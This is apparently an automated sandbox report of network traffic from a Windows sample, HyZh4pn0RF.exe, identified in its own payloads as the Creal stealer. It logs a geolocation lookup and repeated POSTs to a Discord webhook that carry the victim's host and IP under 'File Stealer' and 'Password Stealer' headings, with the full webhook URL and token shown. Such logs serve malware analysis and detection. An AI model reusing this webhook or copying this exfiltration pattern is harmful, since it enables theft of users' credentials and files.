                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:05 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC1333INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:06 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=37aff3e87cec11efbb52ae4c9400efeb; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 2
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453947
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9qMQEAOm6NrlxMh8s5UO%2F%2BHEiFd9jjLNvRT7o6EEr7zlXwjBoVwfX1RzuhBGYqASBddXH8Ev2mezdRqvfmO2DsKUNUlSPrAv99SbtoHzfbc9J96PEV14RAe1z3zC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=37aff3e87cec11efbb52ae4c9400efebca9b0b1ab47e7d0f658e805fca08bf61eebe35b75bba37ff949679cb1f0dcdba; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 41 6d 70 39 77 34 66 30 57 76 69 41 52 55 56 7a 38 4e 46 58 72 61 6c 77 55 59 37 77 37 31 6f 76 77 49 51 2e 75 77 34 57 54 59 49 2d 31 37 32 37 34 35 33 39 34 36 30 33 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 61 35 66 31 39 38 63 63 35 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=Amp9w4f0WviARUVz8NFXralwUY7w71ovwIQ.uw4WTYI-1727453946030-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd03a5f198cc5-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                40192.168.2.849752159.89.102.2534435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC139OUTGET /jsonp/8.46.123.33 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: geolocation-db.com
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC206INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:06 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC171INData Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                41192.168.2.849756162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC1337INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:06 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=381339c67cec11efbb26cece28a49ce1; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 3
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453948
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bil0c3CqXVvvD3zwBq227AuCXJ3tJeoBU0%2BHWNRRSZLHasVn8Ad5p5m3AkkUnFib2hv%2BhS2wH80N8jALQm4SdDrYhkbc0umG8QJ1PufWFMqy0zybpgcuTfF%2F%2BUl4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=381339c67cec11efbb26cece28a49ce1f7bd41e7dceb3c44c257ff999305afb072279e843d1fc80df6472b02d4fd096e; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 5f 5a 69 51 6b 76 33 31 2e 5a 75 72 64 36 39 35 76 64 57 57 74 44 45 4b 31 5a 64 38 55 6b 6c 64 64 6d 76 5a 48 58 4c 62 6b 67 45 2d 31 37 32 37 34 35 33 39 34 36 36 38 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 65 35 38 66 33 38 63 62 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=_ZiQkv31.Zurd695vdWWtDEK1Zd8UklddmvZHXLbkgE-1727453946686-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd03e58f38cba-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                42192.168.2.849755162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC1337INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:06 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=381340887cec11efafbcae4c9400efeb; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 2
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453948
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=McIE3SqgLdgOPtBYrzWiGaix1jCSs7wySKaGD%2FERFbfj2jXNs9fbNTYHjosy5%2FRtcvfHEiDlGvpIAtkJ9IFTmCI4b1Z%2BLin3kwNxa83YpVNZSl%2Fhjv48RnuF2Ds6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=381340887cec11efafbcae4c9400efeb1db3f564adc72d3a8d8b446b99df56db4010188797c4edf082d1b3b232b9355b; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 48 74 59 30 4e 64 75 6b 71 33 39 76 33 74 75 35 43 39 6a 77 78 55 6c 59 4b 6f 73 47 67 50 67 38 4e 48 4a 65 57 6f 6d 55 64 4d 67 2d 31 37 32 37 34 35 33 39 34 36 36 38 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 65 36 63 35 64 34 31 65 30 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=HtY0Ndukq39v3tu5C9jwxUlYKosGgPg8NHJeWomUdMg-1727453946684-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd03e6c5d41e0-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                43192.168.2.849757162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC1339INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:06 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=383335be7cec11efa46d469f692a6ab3; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 1
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453949
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUsp5IVLl%2Bb6bd5%2BDCRNSiDfH7B8zZjIaYqLDDMGTmJ6pmgOsR00vjq30RzdmORPSdFjd58le4q2A%2BoLaag%2F9NQyNs2ryU6CVc%2BzEmSnVMv7zWaZOOQbsclW7Sww"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=383335be7cec11efa46d469f692a6ab3d563670ae8fa136aed5ba07caf916322885a75166b27f336f2d6c006180c359c; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 32 54 6d 70 69 68 75 6a 33 33 41 45 58 43 62 36 55 48 47 47 54 4d 73 30 41 47 67 4f 61 7a 4f 32 32 35 4f 52 63 58 35 33 6c 74 55 2d 31 37 32 37 34 35 33 39 34 36 38 39 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 66 62 39 31 30 34 33 37 33 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=2Tmpihuj33AEXCb6UHGGTMs0AGgOazO225ORcX53ltU-1727453946890-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd03fb9104373-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:06 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                44192.168.2.849759162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
